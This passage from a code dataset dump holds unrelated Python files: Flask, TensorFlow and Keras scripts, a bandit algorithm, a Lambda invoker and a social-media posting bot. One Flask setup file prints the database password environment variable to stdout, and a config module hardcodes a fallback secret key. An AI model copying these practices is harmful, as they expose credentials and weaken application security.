.addon_prefs import get_addon_preferences\nfrom .functions import absolute_path\nfrom .global_variables import avoid_images\n\nclass AUTORELOAD_UL_uilist(bpy.types.UIList):\n\n def draw_item(self, context, layout, data, item, icon, active_data, active_propname, flt_flag) :\n row = layout.row(align = True)\n if item.name not in avoid_images :\n row.prop(item, \"name\", text=\"\", emboss=False)\n if os.path.isfile(absolute_path(item.filepath)):\n op=row.operator(\"autorelad.reveal_explorer\", text=\"\", icon='ZOOM_ALL')\n op.path = item.filepath\n op2=row.operator(\"autorelad.open_image\", text=\"\", icon='GREASEPENCIL')\n op2.path = item.filepath\n else:\n row.label(text='', icon=\"ERROR\")\n else :\n row.label(text=item.name, icon=\"LOCKED\")", "sub_path": "dev/ui_list.py", "file_name": "ui_list.py", "file_ext": "py", "file_size_in_byte": 888, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "bpy.types", "line_number": 8, "usage_type": "attribute"}, {"api_name": "global_variables.avoid_images", "line_number": 12, "usage_type": "name"}, {"api_name": "os.path.isfile", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path", "line_number": 14, "usage_type": "attribute"}, {"api_name": "functions.absolute_path", "line_number": 14, "usage_type": "call"}]} +{"seq_id": "564915560", "text": "from collections import Counter\n# my_dict = {'T': 23, 'U': 22, 'T': 21,'O': 20, 'R': 32, 'S': 99}\nmy_dict = {\n 'a':50, \n 'b':58, \n 'c':56,\n 'd':40, \n 'e':100, \n 'f':20\n }\n# k=0 \nk = Counter(my_dict)\n# 3 highest values\nhigh= k.most_common(3)\ns=[]\n# print(\"Dictionary with 3 highest values:\")\n# print(\"Keys : Values\")\nfor i in high:\n s.append(i[1])\n# print(i[0],\" : \",i[1],\" \")\n# print(i[1])\nprint(s)\n\n\n \n\n\n ", "sub_path": "DICTIONARY/dque11.py", "file_name": "dque11.py", "file_ext": "py", "file_size_in_byte": 443, "program_lang": "python", "lang": 
"en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "collections.Counter", "line_number": 12, "usage_type": "call"}]} +{"seq_id": "107033825", "text": "from Bio import SeqIO\n\ncodons = {}\n\n# read codons\nwith open('codon_table.txt', 'r') as f:\n for line in f:\n keys = line.split()[::2]\n values = line.split()[1::2]\n codons.update(dict(zip(keys, values)))\n\n# read sequences\nwith open('splc.txt', 'r') as f:\n sequences = [str(record.seq) for record in SeqIO.parse(f, \"fasta\")]\n\n# extract exons\nexons = sequences[0]\nfor i in range(1, len(sequences)):\n exons = exons.replace(sequences[i], \"\")\n\n# make rna\nrna = exons.replace(\"T\", \"U\")\n\n# make protein string, get rid of last 3 symbols, which are the stop codon\nprint(\"\".join([codons[i] for i in [rna[x:x + 3] for x in range(0, len(rna) - 3, 3)]]))\n\n", "sub_path": "bioinformatics_stronghold/splc.py", "file_name": "splc.py", "file_ext": "py", "file_size_in_byte": 671, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "Bio.SeqIO.parse", "line_number": 14, "usage_type": "call"}, {"api_name": "Bio.SeqIO", "line_number": 14, "usage_type": "name"}]} +{"seq_id": "372309555", "text": "# -*- coding:utf-8 -*-\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport logging\nimport os\nimport sys\nimport time\nimport operator\nimport numpy as np\nimport tensorflow as tf\nfrom flask import Flask, jsonify\npwd = os.getcwd()\nsys.path.append(pwd+\"/SHRecsys\")\nfrom shrecsys.util.fileSystemUtil import FileSystemUtil\nfrom shrecsys.preprocessing.preKmeans import load_sen2vec_embedding\nfrom shrecsys.util.tensorUtil import TensorUtil\nlogging.getLogger().setLevel(logging.INFO)\nos.environ['TF_CPP_MIN_LOG_LEVEL']='2'\nROOT = pwd + \"/data/data_online\"\nTOP_K_CLUSTER = 100\ndef build_videos_value(cluster_videos_val):\n cluster_videos = dict()\n cluster_val = dict()\n for cluster in cluster_videos_val.keys():\n vid = np.zeros([len(cluster_videos_val[cluster]), 1])\n video_val = np.zeros([len(cluster_videos_val[cluster]), 1])\n sorted_videos = sorted(cluster_videos_val.get(cluster).items(), key=operator.itemgetter(1), reverse=True)\n for index, val in enumerate(sorted_videos):\n vid[index] = val[0]\n video_val[index] = val[1]\n cluster_videos[cluster] = vid\n cluster_val[cluster] = video_val\n return cluster_videos, cluster_val\n\ndef build_videos_index(view_seqs):\n seqs_video_index = dict()\n index = 0\n for seq in view_seqs:\n for video in seq:\n if video not in seqs_video_index.keys():\n seqs_video_index[video] = len(seqs_video_index)\n index += 1\n if index % 10000 == 0:\n logging.info(\"build view sequence video index: {}\".format(index))\n return seqs_video_index\n\nfstool = FileSystemUtil()\ncluster_center = fstool.load_obj(ROOT, \"cluster_centers\")\ncluster_videos_val = fstool.load_obj(ROOT, \"cluster_videos_val\")\ninput_view_seqs=open(ROOT+\"/view_seqs\", \"r\")\nview_seqs = view_seqs = [line.strip().split() for line in input_view_seqs.readlines()]\nseqs_video_index = build_videos_index(view_seqs)\nvideos_embedding, videos_index = load_sen2vec_embedding(ROOT+\"/sentence_embed.vec\", seqs_video_index)\ncluster_videos, cluster_values = build_videos_value(cluster_videos_val)\ntest = np.array(videos_embedding)\nsess = tf.Session()\nseq_tensor = tf.placeholder(shape=[1,None], dtype=tf.int32)\nrating_tensor = tf.placeholder(shape=[1,None], 
dtype=tf.float32)\nvideos_embedding_tensor = tf.Variable(test, dtype=tf.float32, name=\"videos_embedding\")\ncluster_centers_tensor = tf.placeholder(shape=[None, None], dtype=tf.float32)\nseq_embed = tf.nn.embedding_lookup(videos_embedding_tensor, seq_tensor)\nweight_mul = tf.multiply(seq_embed, tf.transpose(rating_tensor))\nweight_sum = tf.reduce_sum(weight_mul, axis=1)\npredict_mean = weight_sum / tf.reduce_sum(rating_tensor)\ndist = tf.matmul(predict_mean, cluster_centers_tensor, transpose_b=True)\ntop_val_tensor, top_idx_tensor = tf.nn.top_k(dist, k=TOP_K_CLUSTER)\n\nsess.run(tf.global_variables_initializer())\napp = Flask(__name__)\ntftool = TensorUtil()\n@app.route('/dnn/<view_line>', methods=['GET'])\ndef dnn(view_line):\n    start_time = time.time()\n    view = view_line.split(\" \")\n    videos_seq, rating = view[0], view[1]\n\n    videos_seq = [token for token in videos_seq.strip().split(\",\")]\n    rating = [float(token) for token in rating.strip().split(\",\")]\n\n    assert len(videos_seq) == len(rating)\n    logging.info(\"row_videos:{}\".format(videos_seq))\n    logging.info(\"row_rating:{}\".format(rating))\n    idx_seq = []\n    use_rating = []\n    for i, video in enumerate(videos_seq):\n        if video in videos_index:\n            idx_seq.append(videos_index[video])\n            use_rating.append(rating[i])\n    rec_result = dict()\n\n    logging.critical(\"videos:{}\".format(idx_seq))\n    logging.critical(\"rating:{}\".format(use_rating))\n\n    if len(idx_seq) > 0:\n        seq = np.expand_dims(idx_seq, axis=0)\n        use_rating = np.expand_dims(use_rating, axis=0)\n        logging.critical(\"user:{}\".format(seq))\n        logging.critical(\"rating{}:\".format(use_rating))\n        #logging.info(cluster_center.shape)\n        for rating, video in zip(use_rating, seq):\n            top_val, top_idx = sess.run([top_val_tensor, top_idx_tensor],\n                                        feed_dict={seq_tensor: [video],\n                                                   rating_tensor: [rating],\n                                                   #videos_embedding_tensor: videos_embedding,\n                                                   cluster_centers_tensor: cluster_center})\n            top_idx = top_idx[0]\n            top_val = top_val[0]\n            videos_seq = set(videos_seq)\n            for i, idx in enumerate(top_idx):\n                values = np.multiply(top_val[i], cluster_values[top_idx[i]][0:100])\n                vid = cluster_videos[top_idx[i]][0:100]\n                for j, res in enumerate(zip(vid, values)):\n                    # videos_seq holds string ids, so cast to str to actually skip already-watched videos\n                    if str(int(res[0][0])) not in videos_seq:\n                        if int(res[0][0]) not in rec_result.keys():\n                            rec_result[int(res[0][0])] = res[1][0]\n                        else:\n                            rec_result[int(res[0][0])] += res[1][0]\n        sort_dict = dict(sorted(rec_result.items(), key=operator.itemgetter(1), reverse=True)[0:100])\n    else:\n        logging.critical(\"not contained!\")\n        sort_dict = {}\n\n    end_time = time.time()\n    logging.critical(\"cost time %fs\" % (end_time - start_time))\n\n    return jsonify(sort_dict)\n\nif __name__ == '__main__':\n    app.run(host='10.18.18.66', port=7080)", "sub_path": "shrecsys/examples/kmeans/kmeans_predict.py", "file_name": "kmeans_predict.py", "file_ext": "py", "file_size_in_byte": 5500, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "os.getcwd", "line_number": 14, "usage_type": "call"}, {"api_name": "sys.path.append", "line_number": 15, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 15, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 19, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 19, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 20, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 28, "usage_type": "call"}, {"api_name": 
"operator.itemgetter", "line_number": 29, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 46, "usage_type": "call"}, {"api_name": "shrecsys.util.fileSystemUtil.FileSystemUtil", "line_number": 49, "usage_type": "call"}, {"api_name": "shrecsys.preprocessing.preKmeans.load_sen2vec_embedding", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 57, "usage_type": "call"}, {"api_name": "tensorflow.Session", "line_number": 58, "usage_type": "call"}, {"api_name": "tensorflow.placeholder", "line_number": 59, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 59, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 60, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 60, "usage_type": "attribute"}, {"api_name": "tensorflow.Variable", "line_number": 61, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 61, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 62, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 62, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.embedding_lookup", "line_number": 63, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 63, "usage_type": "attribute"}, {"api_name": "tensorflow.multiply", "line_number": 64, "usage_type": "call"}, {"api_name": "tensorflow.transpose", "line_number": 64, "usage_type": "call"}, {"api_name": "tensorflow.reduce_sum", "line_number": 65, "usage_type": "call"}, {"api_name": "tensorflow.reduce_sum", "line_number": 66, "usage_type": "call"}, {"api_name": "tensorflow.matmul", "line_number": 67, "usage_type": "call"}, {"api_name": "tensorflow.nn.top_k", "line_number": 68, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 68, "usage_type": "attribute"}, {"api_name": "tensorflow.global_variables_initializer", "line_number": 70, "usage_type": "call"}, {"api_name": "flask.Flask", "line_number": 71, "usage_type": "call"}, {"api_name": "shrecsys.util.tensorUtil.TensorUtil", "line_number": 72, "usage_type": "call"}, {"api_name": "time.time", "line_number": 75, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 83, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 84, "usage_type": "call"}, {"api_name": "logging.critical", "line_number": 93, "usage_type": "call"}, {"api_name": "logging.critical", "line_number": 94, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 97, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 98, "usage_type": "call"}, {"api_name": "logging.critical", "line_number": 99, "usage_type": "call"}, {"api_name": "logging.critical", "line_number": 100, "usage_type": "call"}, {"api_name": "numpy.multiply", "line_number": 112, "usage_type": "call"}, {"api_name": "operator.itemgetter", "line_number": 120, "usage_type": "call"}, {"api_name": "logging.critical", "line_number": 122, "usage_type": "call"}, {"api_name": "time.time", "line_number": 125, "usage_type": "call"}, {"api_name": "logging.critical", "line_number": 126, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 128, "usage_type": "call"}]} +{"seq_id": "602635218", "text": "#!/usr/bin/python\n\nimport spidev\n\n\nclass IRSensor():\n\tdef __init__(self, channel=0):\n\t\tself.spi = spidev.SpiDev()\n\t\tself.spi.open(0, 0)\n\t\tself.spi.max_speed_hz = 500000\n\n\t\tself.channel = channel\n\t\tself.data = 0\n\n\tdef ReadChannel(self):\n\t\tval = 
self.spi.xfer2([1, (8 + self.channel) << 4, 0])\n\t\tself.data = ((val[1] & 3) << 8) + val[2]\n\t\treturn self.data  # read() below needs the raw 10-bit value; without this it divides None\n\n\tdef read(self):\n\t\tv = (self.ReadChannel() / 1023.0) * 3.3\n\t\tdist = 16.2537 * v ** 4 - 129.893 * v ** 3 + 382.268 * v ** 2 - 512.611 * v + 301.439\n\t\t\n\t\treturn \"Distanz: %.2f cm\" % dist\n", "sub_path": "Sensors/IRSensor.py", "file_name": "IRSensor.py", "file_ext": "py", "file_size_in_byte": 521, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "spidev.SpiDev", "line_number": 8, "usage_type": "call"}]} +{"seq_id": "132473619", "text": "\"\"\"Refactor to replace queue logic with lfg\n\nRevision ID: d5208ea8d47f\nRevises: 6a1ea19d138f\nCreate Date: 2020-07-15 12:51:40.082517\n\n\"\"\"\nimport sqlalchemy as sa\nfrom alembic import op\n\n# revision identifiers, used by Alembic.\nrevision = \"d5208ea8d47f\"\ndown_revision = \"6a1ea19d138f\"\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n    with op.batch_alter_table(\"servers\") as b:\n        b.drop_column(\"friendly\")\n        b.drop_column(\"scope\")\n\n\ndef downgrade():\n    with op.batch_alter_table(\"servers\") as b:\n        b.add_column(\n            sa.Column(\n                \"scope\",\n                sa.VARCHAR(length=10),\n                nullable=False,\n                server_default=sa.text(\"'server'\"),\n            )\n        )\n        b.add_column(sa.Column(\"friendly\", sa.BOOLEAN(), nullable=True))\n", "sub_path": "src/spellbot/versions/versions/d5208ea8d47f_refactor_to_replace_queue_logic_with_lfg.py", "file_name": "d5208ea8d47f_refactor_to_replace_queue_logic_with_lfg.py", "file_ext": "py", "file_size_in_byte": 808, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "alembic.op.batch_alter_table", "line_number": 19, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 19, "usage_type": "name"}, {"api_name": "alembic.op.batch_alter_table", "line_number": 25, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 25, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 27, "usage_type": "call"}, {"api_name": "sqlalchemy.VARCHAR", "line_number": 29, "usage_type": "call"}, {"api_name": "sqlalchemy.text", "line_number": 31, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 34, "usage_type": "call"}, {"api_name": "sqlalchemy.BOOLEAN", "line_number": 34, "usage_type": "call"}]} +{"seq_id": "227750698", "text": "# coding: utf-8\nimport csv, json, keras, sys, numpy, pickle, os\nimport pandas as pd\nimport numpy as np\nimport tensorflow as tf\n# import matplotlib.pyplot as plt\nfrom keras.preprocessing.image import ImageDataGenerator\n\nfrom numpy import argmax\nfrom keras.models import Model, load_model, Sequential\nfrom keras.layers import Input, Dense, Dropout, Flatten, Activation, Reshape\nfrom keras.layers.convolutional import Conv2D, ZeroPadding2D\nfrom keras.layers.pooling import MaxPooling2D, AveragePooling2D\nfrom keras.optimizers import SGD, Adam, Adadelta\n\nfrom keras.utils import np_utils, plot_model\n\ndef load_test_data(test_data_path):\n    # read in the test data\n    x_test = []\n    with open(test_data_path, 'r') as f:\n        f.readline()\n        for i, line in enumerate(f):\n            data = line.split(',')\n\n            # parse the pixel values\n            pixel = data[1].strip('\\n').split(' ')\n            x_test.append(pixel)\n\n    x_test = np.array(x_test,dtype=float)\n\n    return x_test\n\ndef prediction_generator(model,test_data,output_path):\n    predict = []\n    one_hot_encoding_predict = model.predict(test_data)\n    for i in range (len(one_hot_encoding_predict)):\n        y = 
argmax(one_hot_encoding_predict[i])\n predict.append([str(i),y])\n\n filename = output_path\n text = open(filename, \"w+\")\n s = csv.writer(text,delimiter=',',lineterminator='\\n')\n s.writerow([\"id\",\"label\"])\n for i in range(len(predict)):\n s.writerow(predict[i]) \n text.close()\n\nx_test = load_test_data(sys.argv[1])\nx_test = np.resize(x_test, (x_test.shape[0], 48, 48, 1))\nx_test = x_test/255\n\nmodel = load_model(\"cnn_model.h5\")\nmodel.summary()\n# print(x_test)\n# print(model.predict(x_test))\n# predict = model.predict(x_test)\nprediction_generator(model,x_test,sys.argv[2])", "sub_path": "hw3/cnn_test.py", "file_name": "cnn_test.py", "file_ext": "py", "file_size_in_byte": 1773, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "numpy.array", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 38, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 43, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 49, "usage_type": "attribute"}, {"api_name": "numpy.resize", "line_number": 50, "usage_type": "call"}, {"api_name": "keras.models.load_model", "line_number": 53, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 58, "usage_type": "attribute"}]} +{"seq_id": "441977657", "text": "import abc\n\nimport torch\nfrom torch.distributions import MultivariateNormal\n\n\nclass MultiArmBandit:\n def __init__(self, num_arms):\n self.num_arms = num_arms\n\n @abc.abstractmethod\n def select_arm_to_pull(self):\n \"\"\"Select the arm of the bandit to pull\"\"\"\n\n @abc.abstractmethod\n def update_arms(self, arm_pulled, reward, transition_cov=None, obs_cov=None):\n \"\"\"Update the reward distribution of arms based on observed reward after pulling arm\"\"\"\n\n\nclass KFMANDB(MultiArmBandit):\n def __init__(self, prior_mean, prior_covar):\n self._mean = prior_mean\n self._cov = prior_covar\n super(KFMANDB, self).__init__(prior_mean.shape[0])\n assert (self._mean.shape[0] == self._cov.shape[0])\n assert (self._cov.shape[0] == self._cov.shape[1])\n\n def select_arm_to_pull(self):\n # Thompson sampling on the bandits and select bandit with the largest sample\n arm_dist = MultivariateNormal(self._mean, covariance_matrix=self._cov)\n sample = arm_dist.sample()\n # arm with the highest sample\n return torch.argmax(sample)\n\n def update_arms(self, arm_pulled, reward, transition_cov=None, obs_cov=None):\n if transition_cov is None or obs_cov is None:\n raise RuntimeError(\"Transition and observation covariance must be provided to KF-MANDB\")\n obs_matrix = torch.zeros((1, self.num_arms), dtype=self._mean.dtype, device=self._mean.device)\n obs_matrix[0, arm_pulled] = 1\n C = obs_matrix\n\n # Kalman predict\n pred_mean = self._mean # no change to mean\n pred_cov = self._cov + transition_cov # add process nosie\n\n # Kalman update\n innovation = reward - C @ pred_mean # tilde y_k\n innovation_cov = C @ pred_cov @ C.t() + obs_cov # S_k\n kalman_gain = pred_cov @ C.t() @ innovation_cov.inverse() # K_k\n\n # a posteriori estimate\n self._mean = pred_mean + kalman_gain @ innovation\n self._cov = pred_cov - kalman_gain @ C @ pred_cov\n # fix to be symmetric\n self._cov = (self._cov + self._cov.t()) * 0.5\n\n\nif __name__ == \"__main__\":\n from arm_pytorch_utilities import rand\n\n rand.seed(0)\n\n num_arms = 7\n obs_noise = torch.ones(1) * 1\n process_noise_scaling = 0.1\n num_costs = 3\n cost_weights = torch.rand((num_arms, num_costs))\n # each arm is a row of the 
cost weight; normalize so it sums to 1\n cost_weights /= cost_weights.sum(dim=1).view(num_arms, 1)\n # give special meaning to the first few arms (they are 1-hot)\n cost_weights[:num_costs, :num_costs] = torch.eye(num_costs)\n\n print(\"cost weights\")\n print(cost_weights)\n\n\n def _calculate_mab_process_noise():\n P = torch.eye(num_arms)\n for i in range(num_arms):\n for j in range(i + 1, num_arms):\n sim = torch.cosine_similarity(cost_weights[i], cost_weights[j], dim=0)\n P[i, j] = P[j, i] = sim\n return P\n\n\n process_noise = _calculate_mab_process_noise()\n print(\"process noise\")\n print(process_noise)\n\n mab = KFMANDB(torch.zeros(num_arms), torch.eye(num_arms))\n print(mab._mean)\n print(mab._cov)\n mab.update_arms(0, 0.5, transition_cov=process_noise * process_noise_scaling, obs_cov=obs_noise)\n print(mab._mean)\n print(mab._cov)\n mab.update_arms(3, 0.2, transition_cov=process_noise * process_noise_scaling, obs_cov=obs_noise)\n print(mab._mean)\n print(mab._cov)\n", "sub_path": "tampc/controller/multi_arm_bandit.py", "file_name": "multi_arm_bandit.py", "file_ext": "py", "file_size_in_byte": 3456, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "abc.abstractmethod", "line_number": 11, "usage_type": "attribute"}, {"api_name": "abc.abstractmethod", "line_number": 15, "usage_type": "attribute"}, {"api_name": "torch.distributions.MultivariateNormal", "line_number": 30, "usage_type": "call"}, {"api_name": "torch.argmax", "line_number": 33, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 38, "usage_type": "call"}, {"api_name": "arm_pytorch_utilities.rand.seed", "line_number": 61, "usage_type": "call"}, {"api_name": "arm_pytorch_utilities.rand", "line_number": 61, "usage_type": "name"}, {"api_name": "torch.ones", "line_number": 64, "usage_type": "call"}, {"api_name": "torch.rand", "line_number": 67, "usage_type": "call"}, {"api_name": "torch.eye", "line_number": 71, "usage_type": "call"}, {"api_name": "torch.eye", "line_number": 78, "usage_type": "call"}, {"api_name": "torch.cosine_similarity", "line_number": 81, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 90, "usage_type": "call"}, {"api_name": "torch.eye", "line_number": 90, "usage_type": "call"}]} +{"seq_id": "529399013", "text": "from __future__ import print_function\n\nimport boto3\nimport json\nimport time\nimport uuid\n\nprint('Loading function')\n\nclient = boto3.client('lambda')\n\ndef lambda_handler(event, context):\n\n iterations = int(event['iterations'])\n function_name = event['function_name']\n\n for i in range(0, iterations):\n start_time = int(time.time()*1000)\n _id = str(uuid.uuid4())\n arguments = \"\"\"{ \"uuid\": \"%s\", \"created_at\": %s }\"\"\" % (_id, start_time)\n\n client.invoke_async(\n FunctionName=function_name,\n InvokeArgs=arguments)\n time.sleep(0.05)\n\n", "sub_path": "tests/delay_tests/harness/harness_test.py", "file_name": "harness_test.py", "file_ext": "py", "file_size_in_byte": 601, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "boto3.client", "line_number": 10, "usage_type": "call"}, {"api_name": "time.time", "line_number": 18, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 19, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 25, "usage_type": "call"}]} +{"seq_id": "271891772", "text": "from flask import Flask\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_cors import 
CORS, cross_origin\nfrom idb.database_tools import build_db_connection_uri_string\nimport os\n\napp = Flask(__name__)\nCORS(app)\napp.config['TESTING'] = False\napp.config['DEBUG'] = True\n\n# Setup DB from environment variables or defaults\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\napp.config['SQLALCHEMY_DATABASE_URI'] = \\\n build_db_connection_uri_string(use_env_vars=True,\n use_defaults=True)\n\nprint('URI: ' + (app.config['SQLALCHEMY_DATABASE_URI'] or 'NONE'))\nprint('EV OPTS: ' + (os.environ.get('SWE_IDB_PGDB_OPTS') or 'NONE'))\nprint('EV ADDR: ' + (os.environ.get('SWE_IDB_PGDB_ADDR') or 'NONE'))\nprint('EV PW: ' + (os.environ.get('SWE_IDB_PGDB_PW') or 'NONE'))\n\ndb = SQLAlchemy(app)\ndb_query_count = 0\n\n#### Jinja2 templating functions ###\ndef getYear(date, justYear = False):\n if(date != None):\n if(justYear):\n return date.year\n\n else:\n return date.strftime(\"%b %d, %Y\")\n else:\n return \"Year Unknown\"\ndef strNumFormatter(num):\n if(num != None):\n return '%0.2f' % float(num)\n else:\n return \"Unavailable\"\n\napp.jinja_env.globals.update(getYear=getYear)\napp.jinja_env.globals.update(strNumFormatter=strNumFormatter)\n# Setup routes for Flask\nimport idb.views\nimport idb.queries\nimport idb.api\n", "sub_path": "idb/__init__.py", "file_name": "__init__.py", "file_ext": "py", "file_size_in_byte": 1390, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "flask.Flask", "line_number": 7, "usage_type": "call"}, {"api_name": "flask_cors.CORS", "line_number": 8, "usage_type": "call"}, {"api_name": "idb.database_tools.build_db_connection_uri_string", "line_number": 15, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 19, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 19, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 20, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 20, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 21, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 21, "usage_type": "attribute"}, {"api_name": "flask_sqlalchemy.SQLAlchemy", "line_number": 23, "usage_type": "call"}]} +{"seq_id": "589550203", "text": "import os\nimport redis\n\n\nBASE_DIR = os.path.abspath(os.path.dirname(__file__))\n\n\n# Base configuration class with default variable values\nclass BaseConfig(object):\n\n SECRET_KEY = os.environ.get('SECRET_KEY') or '1ih298e1kabds9182yekhalkcn,fnlqj09wee190ejjslndadljqoue0912ueo'\n\n DEBUG = False\n TESTING = False\n CSRF_ENABLED = True\n\n TRAINING_QUEUE = \"pipeline-training-queue\"\n\n REDIS_URL = os.getenv('REDISTOGO_URL', 'redis://localhost:6379')\n REDIS_CONNECTION = redis.from_url(REDIS_URL)\n\n\nclass DevelopmentConfig(BaseConfig):\n\n DEBUG = True\n\n # Make sure the following directory exists\n # Flask will NOT create the directory for you\n\n MONGODB_HOST = \"localhost\"\n MONGODB_NAME = \"ai_pipeline\"\n MONGODB_PORT = 27017\n\n DATASET_FOLDER = \"/home/rami/Desktop\"\n AI_PIPELINE_BASE_FOLDER = \"/home/rami/Desktop/base\"\n\n\n# Use this when deploying\nclass ProductionConfig(BaseConfig):\n\n DEBUG = False\n\n # Do not refactor into base config,\n # it isn't semantically correct to do so even though shorter code\n MONGODB_HOST = \"10.180.142.120\"\n MONGODB_NAME = \"ai_pipeline\"\n MONGODB_PORT = 27018\n\n DATASET_FOLDER = \"/home/robotics/Nextcloud/Deep-Learning/Datasets\"\n\n# Use this when testing on network\n\n\nclass 
TestingConfig(BaseConfig):\n\n DEBUG = True\n TESTING = True\n\n MONGODB_HOST = \"10.180.142.120\"\n MONGODB_NAME = \"ai_pipeline\"\n MONGODB_PORT = 27018\n\n DATASET_FOLDER = \"/home/rami/Desktop\"\n AI_PIPELINE_BASE_FOLDER = \"/home/rami/Desktop/base\"\n", "sub_path": "ai_pipeline_main/webui/server/config.py", "file_name": "config.py", "file_ext": "py", "file_size_in_byte": 1514, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "os.path.abspath", "line_number": 5, "usage_type": "call"}, {"api_name": "os.path", "line_number": 5, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 5, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 11, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 11, "usage_type": "attribute"}, {"api_name": "os.getenv", "line_number": 19, "usage_type": "call"}, {"api_name": "redis.from_url", "line_number": 20, "usage_type": "call"}]} +{"seq_id": "366168725", "text": "import tweepy\nfrom mastodon import Mastodon\nfrom twitter_keys import *\nfrom os import getcwd\nimport linecache\n\ndef main():\n\tpath = getcwd() + '/output/'\n\n\t# Open curator file to see which line of the studio log needs to be read\n\tf = open(path + 'curator.log', 'r+')\n\tbookmark = f.readline().rstrip()\n\tindex = int(bookmark)\n\tbookmark = int(bookmark) + 1\n\tf.seek(0)\n\tf.write(str(bookmark))\n\tf.truncate()\n\tf.close()\n\n\t# Read the title of the artwork from the specified line in the studio log, then strip the \\n and save to titleofart\n\ttitleofart = linecache.getline(path + 'studio.log', index).rstrip()\n\n\ttoot(open(path + titleofart + '.png', 'rb'))\n\tupload_and_tweet(path + titleofart + '.png')\n\ndef toot(masterpiece):\n\n\tm = Mastodon(access_token='mastodon.secret', api_base_url='https://botsin.space')\n\tart = m.media_post(masterpiece, \"image/png\")\n\tm.status_post(\"\", media_ids=art[\"id\"])\n\t\ndef upload_and_tweet(masterpiece):\n \n auth = tweepy.OAuth1UserHandler(APP_KEY, APP_SECRET, OAUTH_TOKEN, OAUTH_TOKEN_SECRET)\n api = tweepy.API(auth)\n \n media = api.media_upload(masterpiece)\n media_id = media.media_id\n \n tweet(media_id)\n \ndef tweet(masterpiece):\n\n\tt = tweepy.Client(consumer_key=APP_KEY, consumer_secret=APP_SECRET, access_token=OAUTH_TOKEN, access_token_secret=OAUTH_TOKEN_SECRET)\n\tt.create_tweet(text='',media_ids=[masterpiece])\n\nif __name__ == \"__main__\":\n main()\n", "sub_path": "promoter.py", "file_name": "promoter.py", "file_ext": "py", "file_size_in_byte": 1385, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "os.getcwd", "line_number": 8, "usage_type": "call"}, {"api_name": "linecache.getline", "line_number": 21, "usage_type": "call"}, {"api_name": "mastodon.Mastodon", "line_number": 28, "usage_type": "call"}, {"api_name": "tweepy.OAuth1UserHandler", "line_number": 34, "usage_type": "call"}, {"api_name": "tweepy.API", "line_number": 35, "usage_type": "call"}, {"api_name": "tweepy.Client", "line_number": 44, "usage_type": "call"}]} +{"seq_id": "416647632", "text": "## Hw 3 Question 1\n##\n## Uses numpy's random number generator\n\nimport numpy as np\nimport math as mp\nimport 